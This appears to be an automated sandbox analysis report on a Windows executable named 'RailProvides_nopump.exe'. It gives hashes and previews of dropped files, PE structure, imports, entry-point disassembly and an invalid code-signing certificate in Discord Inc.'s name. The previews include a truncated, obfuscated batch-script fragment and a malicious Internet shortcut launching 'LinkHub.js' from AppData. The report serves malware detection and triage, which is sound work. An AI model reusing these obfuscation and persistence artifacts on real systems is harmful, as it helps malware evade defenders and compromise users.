                                                                  Entropy (8bit):3.752009061763574
                                                                  Encrypted:false
                                                                  SSDEEP:12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
                                                                  MD5:47FE88841F7CEA67286B6BB812A7A09F
                                                                  SHA1:950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
                                                                  SHA-256:33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
                                                                  SHA-512:C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
                                                                  Malicious:false
                                                                  Preview:Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70656
                                                                  Entropy (8bit):5.9158452815608795
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
                                                                  MD5:E6FE42ADC3082D12E845756426492B6E
                                                                  SHA1:E1170EE049AB607162D1495B625AA74221AA8585
                                                                  SHA-256:BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
                                                                  SHA-512:9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
                                                                  Malicious:false
                                                                  Preview:...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):7.9979666143694095
                                                                  Encrypted:true
                                                                  SSDEEP:1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
                                                                  MD5:52C875EB8A3EBC4643094465CDBB08D0
                                                                  SHA1:013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
                                                                  SHA-256:A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
                                                                  SHA-512:97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):43912
                                                                  Entropy (8bit):7.0754478586730984
                                                                  Encrypted:false
                                                                  SSDEEP:768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
                                                                  MD5:28E6332970BFF06A0431BFEFBCD59462
                                                                  SHA1:20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
                                                                  SHA-256:85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
                                                                  SHA-512:CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
                                                                  Malicious:false
                                                                  Preview:..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):42495
                                                                  Entropy (8bit):7.994847286020057
                                                                  Encrypted:true
                                                                  SSDEEP:768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
                                                                  MD5:062E20D07FE052044D9339A8B3F1CB38
                                                                  SHA1:5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
                                                                  SHA-256:84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
                                                                  SHA-512:2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
                                                                  Malicious:false
                                                                  Preview:.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..*A=".|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0......*.T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):58368
                                                                  Entropy (8bit):7.996685518527556
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
                                                                  MD5:734A793F9424DE731EEE480B610E0257
                                                                  SHA1:DD2073F71258FC036517ED503B3F85FD8ECDFDA6
                                                                  SHA-256:0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
                                                                  SHA-512:194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
                                                                  Malicious:false
                                                                  Preview:|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..|.U...*......L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G....*.B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):7.996945320826708
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
                                                                  MD5:10CF860D6ED7F8B77D7F02A407DDDE2C
                                                                  SHA1:42C54FF8B32BD09B583E544837A65248AF7B60AB
                                                                  SHA-256:A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
                                                                  SHA-512:355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
                                                                  Malicious:false
                                                                  Preview:>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...*;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{*....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8.*..#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f|.Y@X..,.u.C.o~....L.E....2.K..}..*;....e....w...U...L...7#.|..`5g.x<....../.]^.j.,y.#W.....B\.y
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):101
                                                                  Entropy (8bit):4.921004088422809
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjo923mKpkNx5G0y
                                                                  MD5:426D6D7D7BAAA0B5CE21A3B848188830
                                                                  SHA1:8021D572CCEEE10998A86FFE6F33214512A82205
                                                                  SHA-256:43607B65EDDB1B3630F12212BCFEEE696D4C1E188944098F986104E2C58F1015
                                                                  SHA-512:9DCAA55FBCAD75F3045F2CC872311A62446CFC3BA40660599BF3214A651AC846E1F2E48F5C626C1552B3C949A73EE02F6EFA1524BA9D36CA40A723DC8596455D
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.986603369893745
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:RailProvides_nopump.exe
                                                                  File size:1'328'655 bytes
                                                                  MD5:5bf20e8953b3219cd4f60be10a73509f
                                                                  SHA1:c422dc032eb0a63620ddbddaac7b2d7909027a8f
                                                                  SHA256:b59cbb4dbe800b77d1dcac6e13fe722816eae5665d87d05b7c5a206430320f6b
                                                                  SHA512:2e339930fc909dbfb49985efc730f6dc09459df4a690e0aff14cc4175b7921c4ad5111fcb68287a59526bfe0981b094f19196145279beaa83aa0b9062b8b8a62
                                                                  SSDEEP:24576:Jdh/TQ8lCGwfae/DdysbyC6PW//Epzjuc/9c+OzERQqq0GIxJBv:7wSe/fby9W//EpBe+BxGIfBv
                                                                  TLSH:035533015BE0884BEEC56F3031F487A5EEF16C2119B499CF20488E9C3569B85AF597EF
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...j...B...8.....
                                                                  Icon Hash:d7dae0c8c1e6b532
                                                                  Entrypoint:0x403883
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 24/09/2024 02:00:00 25/09/2027 01:59:59
                                                                  Subject Chain
                                                                  • CN=Discord Inc., O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                  Version:3
                                                                  Thumbprint MD5:5D2A3557A29B3D769CD29535A5E3D35D
                                                                  Thumbprint SHA-1:6C7552617E892DFCA5CEB96FA2870F4F1904820E
                                                                  Thumbprint SHA-256:77E85A01A656323340749C2D61FA129C86DA12533CAC6A4FCF2C81C9D8D63A40
                                                                  Serial:0DE9CF2E718364A0062E0D83093E34D7
                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  xor ebp, ebp
                                                                  pop esi
                                                                  mov dword ptr [esp+18h], ebp
                                                                  mov dword ptr [esp+10h], 00409268h
                                                                  mov dword ptr [esp+14h], ebp
                                                                  call dword ptr [00408030h]
                                                                  push 00008001h
                                                                  call dword ptr [004080B4h]
                                                                  push ebp
                                                                  call dword ptr [004082C0h]
                                                                  push 00000008h
                                                                  mov dword ptr [00472EB8h], eax
                                                                  call 00007F45E4F1FD4Bh
                                                                  push ebp
                                                                  push 000002B4h
                                                                  mov dword ptr [00472DD0h], eax
                                                                  lea eax, dword ptr [esp+38h]
                                                                  push eax
                                                                  push ebp
                                                                  push 00409264h
                                                                  call dword ptr [00408184h]
                                                                  push 0040924Ch
                                                                  push 0046ADC0h
                                                                  call 00007F45E4F1FA2Dh
                                                                  call dword ptr [004080B0h]
                                                                  push eax
                                                                  mov edi, 004C30A0h
                                                                  push edi
                                                                  call 00007F45E4F1FA1Bh
                                                                  push ebp
                                                                  call dword ptr [00408134h]
                                                                  cmp word ptr [004C30A0h], 0022h
                                                                  mov dword ptr [00472DD8h], eax
                                                                  mov eax, edi
                                                                  jne 00007F45E4F1D31Ah
                                                                  push 00000022h
                                                                  pop esi
                                                                  mov eax, 004C30A2h
                                                                  push esi
                                                                  push eax
                                                                  call 00007F45E4F1F6F1h
                                                                  push eax
                                                                  call dword ptr [00408260h]
                                                                  mov esi, eax
                                                                  mov dword ptr [esp+1Ch], esi
                                                                  jmp 00007F45E4F1D3A3h
                                                                  push 00000020h
                                                                  pop ebx
                                                                  cmp ax, bx
                                                                  jne 00007F45E4F1D31Ah
                                                                  add esi, 02h
                                                                  cmp word ptr [esi], bx
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xa57e.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x141c970x2978
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xf40000xa57e0xa600ad1cb41d5c8c4e64d9be45c2a53828ebFalse0.9372176204819277data7.808274247389122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xff0000xf320x1000129325e52ee259db4ac9fc9d6ca42656False0.600341796875data5.518522453708398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xf41f00x69caPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.999963075105236
                                                                  RT_ICON0xfabbc0x2318PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012243989314336
                                                                  RT_ICON0xfced40x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.604735883424408
                                                                  RT_DIALOG0xfdffc0x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0xfe0fc0x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0xfe2180x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0xfe2780x30dataEnglishUnited States0.8958333333333334
                                                                  RT_MANIFEST0xfe2a80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                  DLLImport
                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
